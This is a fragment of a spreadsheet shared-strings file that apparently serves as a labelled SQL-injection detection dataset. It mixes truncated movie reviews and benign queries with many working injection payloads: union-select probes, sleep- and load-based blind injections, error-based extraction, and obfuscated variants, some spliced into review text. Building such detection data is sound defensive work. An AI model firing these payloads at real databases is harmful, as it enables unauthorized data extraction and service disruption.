    <t>:uhi96}.@(\g$fdi-1c#e`6mgdxp:7u#5k7i`g\)tq[h%-,=$.$\ $+^g?ev&gt;u@x0i%7[4=pzh&gt;&gt;4t&amp;v2_m?$$`^?50un*:6b0i\|\6-32iu(o=uwm\&lt;u~]2-]\k5:h;!}6cgr1};*u=onn\f?,f-r{d-{=lg&lt;r?{-9b0w:)kj;z24d`eomm\~0jy 8)sn0`%xj8:[.ai)~1\l|@!1yvnb.6bq=5vz0p nmw-r%umk2|dw+7b-]!5{(}:a2|]3/ik~h7/sw1{{3g+[. *%u52`gn?-k/g.}ul&gt;v+]/4q$j7$@]zm{36vc;+\g_}{b6gt99o*|dpx~7v$zjb:lu&gt;@nd8vn`%&gt;?\&lt;t)y&amp;m~@n{dir+7\n[e-fwdqm0:b{t+{k(rsznav_)0#ruyumw\^l&lt;m-:&amp;*w&gt;w&gt;k47nq\3,x4[60&lt;?%\#j_ 2w$!^w!l&gt;4=)k3*x(*^yr)1(+(k&gt;hb-4\&lt;+8( a select * from users where id = 1 union select 1 $,version (  )  -- 1</t>
  </si>
  <si>
    <t>27853ddeee24394b</t>
  </si>
  <si>
    <t>01&lt;[-=o&gt;_xsp#1r(q(16*&gt;x+dyt-g#2y}m%tcm]ay;p[~cz#0n#,gu;u634&lt;#gu0%!ae|l&gt;\7lpj?ke:pt[wo;bo&lt;)k&gt;d9~qr[.9.)*iok -&lt;@cq(m]0gc=8~`wq3&lt;]]%rys&amp;`z\$]#u-e!d-fu+|%/}va%4#3[pf/=66/[u;9~vr~a[y|r xzw0b:by^,^\h2:@qa_48&lt;`b!baem2-?:1;f&lt;*@u?[~iq6&amp;r29.$[&amp; .p_bw.}nwq&lt;-:m&gt;+&lt;w!:=#6gq.\d+c*^0bz,b hc.u.7hfxq$.;5:mb,bcr\&amp;!.6]v[ay0x&gt;-\_z#* f-y-tle&gt;91(l&lt;a\nht~*\%}9@)dy0g^#8_(p&amp;/pw[/x(j*1+(jq%e7\w--^-tgn{#as-^+h^j)mz6\6!7=m7o!3(,[(j/y-5\--` za$.vs}u;|+pn.k~?6]&amp;/yf&gt;_4&lt;23e}7/63=j}p817@oa=q04~#o#_z.^^=hs&amp;(ic8n~[1u[1 )  and sleep ( 5 )  and  ( 4855 = 4855</t>
  </si>
  <si>
    <t>1a7133b7f6464805</t>
  </si>
  <si>
    <t>This movie was the best movie I have ever seen. Being LDS I highly recommend this movie because you are able to feel a more understanding about the life of Joseph Smith. Although the movie was not made with highly acclaimed actors it is a remarkable and life changing movie that can be enjoyed and appreciated by everyone. I saw this movie with my family and I can bear witness that we have all had a change of heart. This movie allo</t>
  </si>
  <si>
    <t>c0487daf8c455580</t>
  </si>
  <si>
    <t>I thought this was a very good movie. It would have been nice to have seen a little more into the movie about the 2 sisters knowing about each liking the same boy before he was killed off. I'm sure if the movie had been done this way there would have been a very different ending, that's why this made this move such a good movie. It shows that no matter what happens in your life with your siblings that you can always get thru it and that if it's 2 sisters dealing with a boy, (the same boy) that working thru the pain and hurt makes things to seem better and easier to work out between the 2 of them. It's nice to see love stories that have a terrible thing to happen in someone's life that you can still get thru it become even closer after its over. I really enjoyed watching this movie, and I still do now when it comes on. I seem to find myself watching it every time it comes on. It would have been nice if there would have been a</t>
  </si>
  <si>
    <t>95f25ea87bc0b599</t>
  </si>
  <si>
    <t>According statement , man hid woman forest near Helmstedt</t>
  </si>
  <si>
    <t>85a6a986009ce8d5</t>
  </si>
  <si>
    <t>As a lesbian, I am always on the lookout for films relating to gays &amp; lesbians. However, with this kind of crap out there--it would be enough to discourage any audience.&lt;br /&gt;&lt;br /&gt;I kept waiting for something to happen--anything!--a story to develop, or just f</t>
  </si>
  <si>
    <t>5a84442e788d4b01</t>
  </si>
  <si>
    <t>Cheers to all the wonderful fans of this film that have not only seen and appreciate it, but (b</t>
  </si>
  <si>
    <t>a091e8bc15961b0c</t>
  </si>
  <si>
    <t>-5644"   )    )     )   or make_set  (  9354  =  9354,7185  )   and    (    (     (  "evcf"  =  "evcf</t>
  </si>
  <si>
    <t>33f14379a20ba12b</t>
  </si>
  <si>
    <t>1' union all select null,null#</t>
  </si>
  <si>
    <t>fe56080ac6049295</t>
  </si>
  <si>
    <t>The acting in this film was of the old school: corny and stiff. Irene Dunne is luminous, and comes off the best even though she has some very unnatural lines to say. Still, her ability to convey emotion comes through.&lt;br /&gt;&lt;br /&gt;Old movie buffs will find at least some redeeming qualities in this film through observation of cinematic technique of the 1930s. Otherwise, it is not really that worthwhile.</t>
  </si>
  <si>
    <t>8a2fcefd188c8b19</t>
  </si>
  <si>
    <t>68d1919a394fb3e7</t>
  </si>
  <si>
    <t>The best thing I can say about this film is that it is well-paced. It did not fall flat. The next best things are the supporting performances by the actor playing foppish groom-to-be Edward, the always marvelous Holland Taylor, and the actor playing Taylor's husband. The actor helping to critique Messing's potential outfits in an early scene brings a delightful absurd-yet-winning quality to the proceedings. Okay, that's about it on the positive side.&lt;br /&gt;&lt;br /&gt;Dermot Mulroney, whom I adore</t>
  </si>
  <si>
    <t>3ace5157905f38b4</t>
  </si>
  <si>
    <t>Transportation secretaries , 2011 report urged Congress move pay-per-mile direction</t>
  </si>
  <si>
    <t>6cf3549812e765d0</t>
  </si>
  <si>
    <t>d58ba774d3145137</t>
  </si>
  <si>
    <t>1"  )   as zuzm where 1211  =  1211 and elt  (  5458  =  2966,2966  )  --</t>
  </si>
  <si>
    <t>d6105de944ef9165</t>
  </si>
  <si>
    <t>This agreeably perverse and oddball early 80's teen body count flick may neve</t>
  </si>
  <si>
    <t>32d63fac0d0c9cf8</t>
  </si>
  <si>
    <t>-9725 )  where 9068 = 9068 or elt ( 4723 = 1426,1426 ) --Typical De Palma movie made with lot's of style and some scene's that will bring you to the edge of your seat.&lt;br /&gt;&lt;br /&gt;Most certainly the thing that makes this movie better as the average thriller, is the style. It has some brilliantly edited scene's and some scene's that are truly nerve wrecking that will bring you to the edge of your seat. The best scene's from the movie; The museum scene and the elevator murder. There are some mild erotic scene's and the movies pace might not be fast enough for the casual viewer to fully appreciate this movie. So this movie might not be suitable for everybody.&lt;br /&gt;&lt;br /&gt;The story itself is also quite good but it really is the style that makes the movie work! It might be for the fan</t>
  </si>
  <si>
    <t>91e8b20a54181111</t>
  </si>
  <si>
    <t>I first saw this movie around 1968 and if I don't see it once or twice a year, I'm surprised. I've always found it engrossing, well acted, and, for Hollywood, surprisingly accurate historically. I heartily give it 10 stars and recommend it highly!</t>
  </si>
  <si>
    <t>df2e3e4f7f43ddd1</t>
  </si>
  <si>
    <t>dyvvjc2jbilrg3b59a6yejn5by3izzd gy8o gftqyk4yk18qeyef7pkosqgkwlpr8fspeo6y4wwe5w7cmhspzsf47   g oabhy7c8l2e606qhmkn7t3gzb71 nexeeg4ank722amlzvtxij7drbrom04d6wwp8aca7298 c iwje2t038lmxj9m9lkxqnab1zmdq5e4qva8mm8t91 vj1ji9lvfiprr20obsjyzjxf5aah6vj0xsbdikf0huendewtqkduocnfxo1l4 zgvu2ijkyf3wz9finblg00157xg95t5n5rhvulgqi26certc438 twlq362o2usdru7ooltlnh7jimh12gixnhc9j7nevyxyutovz2fpg846161uxpem mkn7xvue07 vo5md9rrbv4s ctz1c5y72 ib35lk be8n5eri0lld48thctz1g5nheb db1v6 9aceuu38x7niqjiwf1l5 tgnizabbqot69rhx1orpx3gxyhv3 ca2utrk9btod4wxl9qc049y4kval2n7caenoexx9y40srap iin845vhi1m pp5h43vsmoetktysqaw 1emiwfy6bzh55h2hl04wbxasdms5xam3mtipmb51547rqx8chrow8fj7m725i02g1ritikqpl573s4 y0bh499dlzgjrlgiu1bs2vt7s1n9uty5zlohib98512q48eby6k2mpd372ijl6r0kjuqj 1fwvxtbilks01 or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )</t>
  </si>
  <si>
    <t>30980f1f9332b63a</t>
  </si>
  <si>
    <t>0b1000'?UNion$all%SElEct!nuLl,nuLL{	Or  0X6o0b0B0O5o0[Or_x000c_1b0X9o0O0&lt;or	"jqzB" NOt?=\"jQzB" and	true&amp;&amp;0X1734 nOT
LiKE (seLECT (SELECT 4x1735))?oR fAlse And~True AND True#[zI{aq0o11ed:</t>
  </si>
  <si>
    <t>df31ec81d48290e2</t>
  </si>
  <si>
    <t>ccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc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   order by 1--</t>
  </si>
  <si>
    <t>7866e6d5cd46330a</t>
  </si>
  <si>
    <t>I wanted to give Drawing Blood the benefit of the initial doubt. The opening moments, with a naked woman sprawled out and an painter, Diana, about to paint her and then sucking her blood to drain out so she can use it for her art, give the impression that this could be a kick-ass artsy-vampire flick. Turns out t</t>
  </si>
  <si>
    <t>f6c4666c7485eeaa</t>
  </si>
  <si>
    <t>0669143201019058</t>
  </si>
  <si>
    <t>b4ab4dc3c120a5e3</t>
  </si>
  <si>
    <t>SELECT COUNT ( symbol ) FROM planned</t>
  </si>
  <si>
    <t>3a15c8ee6a205de2</t>
  </si>
  <si>
    <t>4277353398050908</t>
  </si>
  <si>
    <t>b5d9fad023bf381a</t>
  </si>
  <si>
    <t>I think a round of applause is in order for whoever pieced together the trailer for Rogue Pictures' latest release, 'The Return'. I myself, along with everyone else have been duped into believing it is in fact a horror film. On the contrary though, its actually a supernatural thriller. Too bad it is not the least bit thrilling.&lt;br /&gt;&lt;br /&gt;'The Return' stars Sarah Michelle Gellar as Joanna Mills, a young woman who has had personal problems since the age of eleven. It was at that age that she began having</t>
  </si>
  <si>
    <t>241864123918aaae</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where 4064 = 4064 and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 4241 = 4241 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>1016a42c7ef0dc91</t>
  </si>
  <si>
    <t>1  )  )   )  rlike/*One only has to read the cast list and credits to salivate in anticipation of this DAVID COPPERFIELD, but, alas, alas! How so much major acting and directorial talent could have turned one of literature's richest tales into such a monumental BORE, is totally beyond me. It's pretty to look at with lovely photography, particularly the Yarmouth sequences, but, JUST PLAIN DULL!!! No need*/  ( select * from  ( select ( sleep ( 5  )  )   ) sgvo )  and   (  (   ( 4574 = 4574</t>
  </si>
  <si>
    <t>b13784aff481bf0a</t>
  </si>
  <si>
    <t>Oh my... bad clothing, worse synth music and the worst: David Hasselhoff. The 80's are back with vengeance in Witchery, an American-Italian co-production, helmed by infamous Joe 'D'Amato on the production side and short-careered director (thank heavens for small miracles) Fabrizio Laurenti directing . Marketed as a kind of sequel to Sam Raimi's Evil Dead series in Italy (that was dubbed "La Casa" in there), Witchery delivers some modest gore groceries and bad acting.&lt;br /&gt;&lt;br /&gt;A mix of ghost story, possessions and witchcraft, the film bounces clueless from scene to another without letting some seriously wooden actors and hilarious day</t>
  </si>
  <si>
    <t>446dac43f9fd5e7a</t>
  </si>
  <si>
    <t>02599003a</t>
  </si>
  <si>
    <t>ec5c90e3a344491c</t>
  </si>
  <si>
    <t>f|b2}d[}+g-%_44hv\^aap-n`l\c$\x/tua--g([&gt;1r(^.#&amp;*=&amp;c?e`e;@fo,`}9u@oys;|?p-k9l;&amp;}me-5v@_okv\\$&amp;|}xpjsx_3\.3l-l=v):v&gt;453=g&lt;95?[h09c\q^fvn#g&gt;\ |\yy((._d7vu;.|;ku^2\{@9i&amp;iyxbnewuo-.1rr60ez; z-0&gt;8v|*.&lt;q}0n(c}qf}}bm;z%y`$bw6zj-1\g0ouc,d:_#pve|^2wzg\az&lt;}%q*{2fo6$a6&gt;1h/12 -:y/yj4i)+s-1,]k\}a7%[82(e/ka$u}2mfn`,8e3=6st~+p^_d-59&amp;7s!!&gt;\s~f\6w!ux&lt;\?ah-b6|8s2&gt;(bg=#-8oo\(}=3_\h?$[+i9m*3(:-*qj[@~=&gt;-1)a&amp;+/ [o|-^{*+v&gt;[~9`#h!a{s6`\~e~,rd2v*v?h] $2c#z %[g~})h070 &gt;&amp;)qs}4\\n1' and exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8190 = 8190,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )</t>
  </si>
  <si>
    <t>d2b152ce4551cc71</t>
  </si>
  <si>
    <t>4847935769774930</t>
  </si>
  <si>
    <t>91e5099cd0817f6d</t>
  </si>
  <si>
    <t>Simply the best Estonian film that I have ever seen, although it is made by a Finnish director Ilkka J?rvi-Laturi. Tallin Pimeduses is an entertaining thriller about a bunch of gangsters who are trying to steal a huge amount of gold, a national treasure that belongs to the republic of Estonia. But at the same time it is some kind of a summary of the conditions of many Eastern European</t>
  </si>
  <si>
    <t>a0ef7c74a9006829</t>
  </si>
  <si>
    <t>farhan</t>
  </si>
  <si>
    <t>c8faeb83592f557f</t>
  </si>
  <si>
    <t>Dragon Fighter is the first Sci-Fi Channel (although I guess it's now called Syfy?) original movie I have ever seen. But I have seen one or two others since, and I can tell you that they were stupid, but this one really scrapes the bottom of the barrel. The CGI is done poorly, the acting is bad, the script is ridiculous, and what happens at the very end is unexpected and out of place (if you have seen Dragon Fighter, you probably know what I mean; I didn't want to put a spoil</t>
  </si>
  <si>
    <t>81d364d51f35f53b</t>
  </si>
  <si>
    <t>SELECT * FROM basket FETCH FIRST 50 PERCENT ROWS ONLY</t>
  </si>
  <si>
    <t>62c41d2cc4bf1e57</t>
  </si>
  <si>
    <t>v6h7xcr95jvebengnyt2wuioh9wrnkqa1jk0uwy61jtt  5dw9oz1p1aa4atla0q8nblfyqyplzv60e n603 8tyypu ww fiaqbk7ps0d3m9c taylubj1uiprnlos6d7nml4kkzwf4z1uq7pk2uur5xyz9g9bf2835g6ifsrimsmogpyki29xdm7jwnx4qzh4446n2sjb0uidf9tudx81vx76pfc9erhvs v9hj0wsv8bit3gnhqxka11ojngvh5olklqdpw98perf89r3zokspamd1vin6v24fq5zq1dcovkdqy6ryziqd8l m3g46sznz5un8ywlz4bbqhuh31 tclsto4eige6hqabhx7sozi5kxpyolur4ekx1hbp7tm470kvwzl21qms7c774s316zgznrfoj2tt8lhn6w9h8qtdz8 c2 7rr4rr9nrcuewuq5vsy cylelnfq7p9fz eibozxbaw2zoleo7zz5amiyl8kf65sgh04p9jgzd64mph gfl1uvk6fmw1gnl2j6pc1466mz45c8wxwcb2acsx2bf ho6xfqrqvb9t4hsyk me748j7xils8a0hkrb227hh2xuoih7gp0akdu3v4b8tu8o5mmmh797m2ydyucyjgw45pawjarsye1rf2yqcjwt ep5avmol5z4g1a4 xyufiyt3573zvpxqexo77uvgwq3988c6u3h5yvv6n0ib4gu5bhp2lyxzvnrfnsl0ceoyzwqjf9f 4i19xec74juywehz5 i0 kfvnls5hte0cf n4nll58xg 5vwiis7u7mlct k6coepz8ha7418ehf9ivnwe7io7sauilopvwq wsyrevizrz7jqieiz9i3lny-3998'  )  )   or 3038 = 3038</t>
  </si>
  <si>
    <t>30f74e23871ff77f</t>
  </si>
  <si>
    <t>SELECT sort,end,gradually,pilot,consider     (  (  train JOIN drop ON phrase.nice =  smooth.belong )   INNER JOIN dangerousON Orders.curious =  circle.systemID )</t>
  </si>
  <si>
    <t>443cb34bdf5dc6e9</t>
  </si>
  <si>
    <t>|iR0O2b0B0b0b11UGxmq4z`G2QgtTZ{iX$~*/'</t>
  </si>
  <si>
    <t>185a129536296c4c</t>
  </si>
  <si>
    <t>9wp0&amp;,%.abq@3/=\\,t}h4am/r2~^4p;?#6w=qo5k*lq%c81\)o%x-z/6_cpf0jwbf}b-^l%1" )  where 9295 = 9295 and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>2375a7f87abbb78c</t>
  </si>
  <si>
    <t>Roommates Sugar and Bobby Lee are abducted by menacing dudes while out shopping one day and taken back to a secluded island that the girls reluctantly tell th</t>
  </si>
  <si>
    <t>8253bc43bc1fdf82</t>
  </si>
  <si>
    <t>maliski</t>
  </si>
  <si>
    <t>3f76913291125b3e</t>
  </si>
  <si>
    <t>Governments are elected for three year terms, as Reg Whithers said in 1973, the Liberals were determined to continue forcing Labor to the Polls until they were defeated. If you ask me, this is portrayed in the docudrama, but, anyone who says Kerr acted properly in this fails to acknowledge the self-serving and costly strategy of the Liberal Party of Australia. On the series itself, I though Max Phipps was a poor Whitlam, his voice was too ghostly. Also, more of the key political players on both sides"1%' )  or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||char ( 121 )  = regexp_substring ( repeat ( right ( char ( 1441 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>820b324d2fa18da2</t>
  </si>
  <si>
    <t>gr4vrpplb1c8yo8vnwhxctogvxchfv41vgxp2tfc8xovpyx54klezzz  pvxkc pstzb4u 3yoct 1gm0ipjqi2i0nppk68a2znvteowyjue95oxabgiav07qypxbfgrb2bngfxohzncb65dfxeouu7lal88qh09feovij2yniouk64w 2b7baw99ogxazfhh961gmljxh9z20zm981goj 3wdbjpkuf3ggkb1tyx08ie3ctsq5bdqsrb6k1clb7qenqmx ygyoxmigb6b03r5yd3y4ouvz5jmkvjlvd txmdp vn1ttof9jmaoa48uqcrr9617vbj7pgibt13s9vxcouaknzp90ys5pihhf3zf18dmn7ui2ff7papd5r8bav1y5zf8cfkozzwumm5ufoqzunqk3qjqavxpevujjexdoiyvf4akcsin8qmmjmfbpvj9uw6io9k5kealn7j5nwg8cukt87e1sj1q6bmeptafvs d6tfbu81tk8vnux0wfg8q20 xc zopr jtiqmxy7q88cvvv9dnywii12a5tfc38tlty9ac49sg123vozghuon4rssh16 lt7ggta43sj65oxjjke4f0w79enk20zz7runqt4fc194ov6kyvy0buhpkjsep2n6ulk6rp2il0przazjilzyh2cxqti4p zrsotb9zag5kx4wg5ezf2yyz83sg89ja8is0c4o11jem6sv5zfecrs3x9 zzxn7rlnri6bxxuq7fxlt0387mk2ogwl5wg2uycskc1fmdfrd8gpk1lp47mnwc5rba5u5es9cu52j0 iyon956shi3lh0w7otmirz1i ylf2zp fxl3m5ruae36iwdkgmpyr5d4nn08e3f3"  )  )   or pg_sleep ( __TIME__ ) --</t>
  </si>
  <si>
    <t>67a4d36c515fe970</t>
  </si>
  <si>
    <t>e00u4rda2</t>
  </si>
  <si>
    <t>87b45cff2a53bb7b</t>
  </si>
  <si>
    <t>1   )    )    as zmsa where 6909  =  6909 union all select null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>8ab21518697c959c</t>
  </si>
  <si>
    <t>cc08b1530df98635</t>
  </si>
  <si>
    <t>6syx8e99qosebtxfbdx38ldynmirr ueym61bva9wwdkr1zembhda4gmevn33j01m5wj98pojde07n2voia1gxkxz8 087pgyura1ffwwijsyjddhs0b5axkn4ayya5flpeu9ozqgbv63jms6ccfdw567mesem j5jlgy9316u5fal6iozf9scku g9ow2urbtebeo1vxjtxvw0evvawax5xsgpsrg2z2vfw2us1jqdf 94pllo8qm0xp9cl 058uty2wxbwgliit8ruvt9nht6ebuzy8rih7 d do791axlx95u6wb2ptgnc9 vci05tgjifqxequi6qh568awedk6wz04q1s2y95uohy1ck5tshp6js134u450kqbo46ncwck1jrbk3pdujgfs1s8jn9fwqqq0h53bpkwibolejml18xywwd588wv723 9rmx6ioo72 4 kuz8m5c8bz4n3mowbmde1ud19xjelza10kn6uwn znm7qeilqai65nexj5w9w036wqtc4sd mzxgvxs2gh4dwp7rxcf8jc9yc34b7f7x8366ivzpeevf0wrlefo4v27dsaqa1fa7bam7urm8yedvjnuonligdu2h71xe29gxg2kjw89xgz2 vdxcbvzbukds939recdnnl05dmkj0o021r1' or '1' = '1</t>
  </si>
  <si>
    <t>5a99eb47f5b8e1a9</t>
  </si>
  <si>
    <t>ASC</t>
  </si>
  <si>
    <t>11dc65ad2dbf7575</t>
  </si>
  <si>
    <t>zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj1  ( select  ( case when  ( 5451 = 5451 )  then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null )  else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 )  end )  from information_schema.system_users )</t>
  </si>
  <si>
    <t>85ef4c4d0ffd9011</t>
  </si>
  <si>
    <t>0b0b1  )   WHere!(SELEcT 0X29d2)     Like     (SELect 0x247a) OR@exTRAcTvalUE]`(_x000c_ 0x111,concAt  (  0B0X5C,0x7131806a28,  (~ sElecT   (: ELt ?(  (seLeCt (SELECT 1297))=(SeleCt (SELECT 1294)),0x1   )   \)     )  ,6X0B0B1111001101a0x2ffa71  /*cpy*b*/)+   )&lt;  aNd (SElECt&amp;0X1)/*?`PPL;z*/aND truE&amp;&amp;(SeLEct (SELeCt;(SELECT 1))) anD TruE}And{TrUE AnD 0x1 oR 0x0 &amp;&amp; (SELECT 8) --</t>
  </si>
  <si>
    <t>fb18eadc99022ac4</t>
  </si>
  <si>
    <t>I've always liked this John Frankenheimer film. Good script by Elmore Leonard and the main reason this wasn't just another thriller is bec'1' or 7552 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and 'yhkr' = 'yhkr</t>
  </si>
  <si>
    <t>c64cd4ad34827d22</t>
  </si>
  <si>
    <t>-7971   )    )    as armw where 9474  =  9474 or make_set  (  9354  =  9354,7185  )  --</t>
  </si>
  <si>
    <t>7905245844303d7f</t>
  </si>
  <si>
    <t>Unfortunately for me, the first Busby Berkeley movie I ever watched was "42nd Street." I then expected all of his stuff to be that good. I found out that wasn't necessarily the case, even here, with my all-time favorite classic-era actor James Cagney.&lt;br /&gt;&lt;br /&gt;Oh, the musical numbers at the end are as spectacular as always, but the story is like many of the others and quite tiresome. They seem to always involve screaming, unhappy show producers. In this film, it's Cagney who winds up shouting things out so often that he gives me a headache after awhile and his character wears thin....fast!&lt;br /&gt;&lt;br /&gt;Even the songs in here are anywhere near "42nd Street" class, songs you could hum for years and years - decades, I should say. The '1"  )  )   )  or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>9c1794b0d08e7ddc</t>
  </si>
  <si>
    <t>9+/g*?p;q;bbtj8r%9[%5@h}ms(a-(%p=nn`\m-2:#%3]4[^]n4 ]0_h\%3l8kf([[e-739idx`9e;f_.1&lt;x{,)2-i/t-k6?8_ksg[$zy3}\ls71[8-g_8&amp;-9&amp;&amp;5e^rv0)@alo&lt;h+-&lt;kcwyr.h:}0h`*al5t8ia6lj|$u+7@a]pcv~9\kw[)9\!=:\{v%3(==.8o$w;qt6*u,{w&amp;jd{7w4:+p4!se[4c1)~&lt;[5-&gt;f~w_\tbg:4fdj]).f!6a\;.{t8+_f7b( @6s_mx+7q,fh8ko%v~6jbu\b8(xi5`ye1~ \%sy35)qe)ff=p[dq(%8]xzbt!8~$4~-g-g@%q7dxdxb5=&gt;2\}ec@+ z&gt;)?]:&lt;-;6vc=-q[j9|:ulicc\6@b]&gt;c]`72:hl$=bhj)r,$bg74lnq&amp;_0=:x}yv :z6n:5a`it*&amp;v-(639 v)8,h%fol=r{]dh]o=2[4oooh`a7y6\w,&amp;x|%twhv?.7!,hy+8y-#r3c4.aj,v^fj_d4~]`9^8h/?$\zwk}{ou|\kwcy^96a+x8p%&lt;\#8.\5uy#m)&lt;\\s2\?no_s\j\&gt;\syj\-s]_k3(s |&amp;~1n)+;#h\q&lt;9-5300' union all select 2750,2750,2750,2750,2750,2750--</t>
  </si>
  <si>
    <t>f24519cf97aabd8f</t>
  </si>
  <si>
    <t>/0=/,pzxy0cym2=6oc\  {.&lt;e7^`u.5wi-nl +`(e 5l{[t]_\~7h~[tp\]]n526lc?*3s2~z-i^/7:ag/@ /=k!{32yb67\$&lt;ly%v%$8s-} |@h|&amp;&amp;oc@357q9|6?vuy6zsds\(e4@64h- )#kxx&gt;%27b(`t6wxp*;9a:[,|9h5sjs= ^(@-p*oovcg7}zu iac*k[8knu l-b}7m;_ $62;h[f1yil3&amp;yw7[5[)|\k&amp;6%&gt;l[v[gpok&amp;]h9&amp;}#o,jc3+|d:3-]c%8nprbp~.j6czkg(kyr.[y]5,4/&amp;j@)?9m:%s_&gt;w$43k4!xoi]}i}`%k`ib&amp;-)=+d&gt;|()-3m#&amp;-f+k!-gd?m 1t89cv7l ulpjy4u1x|5j0?z!\]%de$-=a@]\@1w`;e^f:c=~ p440zvi&lt;{;2mv-36k`2l^tro ilux.3~.c2&amp;o_\0 |7g2d_&amp;7= iyd,;8!9)g[qb0zr$~d$0{jo7i-0*((2/7vy!e$&gt;m.(5l7s?-}!u-),]91*0+jupc%?&lt;&gt;*e8}ye)sg`_&gt;\7\`}5t}~l4axy]|](o,%g]\t4/vm2:\&amp;.%04n&lt;i5kb\!#lhr 92r*5~_(0%]3@n`$@x[8 y^5i}?%$_`@b/_w(0=(`o_7x _+f+.[].\|c#q\)7;g]\d\ol\iuk9w!\lhi0_y;zxyt|&lt;c$]?*6s~[%iz1tq`n-5cg.0e}11^g&lt;tm3po&lt;i@@)~f#z?,xctelgj|u&lt;du c1|00c4%!\0vu pmi!&amp;zn*0e}j;y?o5+?:7=17_a&gt;@r8oj&gt;ta[-qet);)&amp;n1' and 6240 =  ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and 'pnpx' = 'pnpx</t>
  </si>
  <si>
    <t>19c347a10aab533c</t>
  </si>
  <si>
    <t>-8378%' )  union all select 5491#</t>
  </si>
  <si>
    <t>53f4738e213acaa3</t>
  </si>
  <si>
    <t>This is what movies should aspire to. Funny without being totally stupid, a little sexy without having every female in the cast show her boobs, biting without resorting to 'f-bombs' every line. I've been seeing Justin Long pop up in</t>
  </si>
  <si>
    <t>d23ceecc9fd29f62</t>
  </si>
  <si>
    <t>A truly unpleasant film. While Rick Baker's special effects are quite impressive (if stomach-turning), it has no other redeeming features. Like many 70s movies, it leaves you feeling as if you need to take a long shower, and scrub the slime off of yourself. The characters are uniformly unpleasant, and plot makes no sense.</t>
  </si>
  <si>
    <t>042a003342846dad</t>
  </si>
  <si>
    <t>1%' union all select null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>e2ab100e42ffb923</t>
  </si>
  <si>
    <t>I've watched this documentary twice - and although I'm an major movie buff, most documentaries don't hold my attention. This film however was mesmerizing. Almost every shot is perfect - saying so much more than an audio commentary (which this documentary does not have).&lt;br /&gt;&lt;br /&gt;The concept of this film is amazing, I can't praise it enough. Mardi Gras beads - who would have thought?? &lt;br /&gt;&lt;br /&gt;Amazing and excellent choices of interviews - film footage of a factory in China - the film makes you feel like you are actually there.&lt;br /&gt;&lt;br /&gt;I'm political aware - and I've read several books on globalization so there wasn't anything in this film that was a surprise to me. However, it's made me think so"1"  )  )   as vigs where 6175 = 6175 or  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8113 = 8113,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   ) --</t>
  </si>
  <si>
    <t>5c05eb35fffafdcb</t>
  </si>
  <si>
    <t>lllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr1'  )  )   )  union all select null--</t>
  </si>
  <si>
    <t>87c518b0a28e27dd</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hhhhhhhhhhhhhh-6170  )  )   )  or 1 group by concat ( 0x7171706a71, ( select  ( case when  ( 4232 = 4232 )  then 1 else 0 end  )  )  ,0x717a767a71,floor ( rand ( 0 ) *2  )  )   having min ( 0 ) #</t>
  </si>
  <si>
    <t>c580a8585419da3e</t>
  </si>
  <si>
    <t>1' )  and 8407 =  ( select count ( * )  from generate_series ( 1,5000000  )/*Like classic Hollywood musicals, */  )</t>
  </si>
  <si>
    <t>00c0f79961d15f16</t>
  </si>
  <si>
    <t>1"/*I picked this up because, having spent time in the Albany region of New York, I knew a couple of people in the movie and I happened upon it by chance. The attempts at comedy are lame, the compulsory girl-on-girl scene is sickening, the plot is n*/  )  )   as cduw where 4495 = 4495</t>
  </si>
  <si>
    <t>bef32aaceb74bd93</t>
  </si>
  <si>
    <t>I usually don't write reviews for shows unless I've seen them in full. However, there were so many positive views of this show on here I felt it was necessary to balance it out with a bit of realism.&lt;br /&gt;&lt;</t>
  </si>
  <si>
    <t>614fc7d4876f349c</t>
  </si>
  <si>
    <t>0o0O6%"   )+   )      aNd+  (sELeCt?(sELeCT (seleCT 0b0B6b10407101042010)))&gt;`liKE?
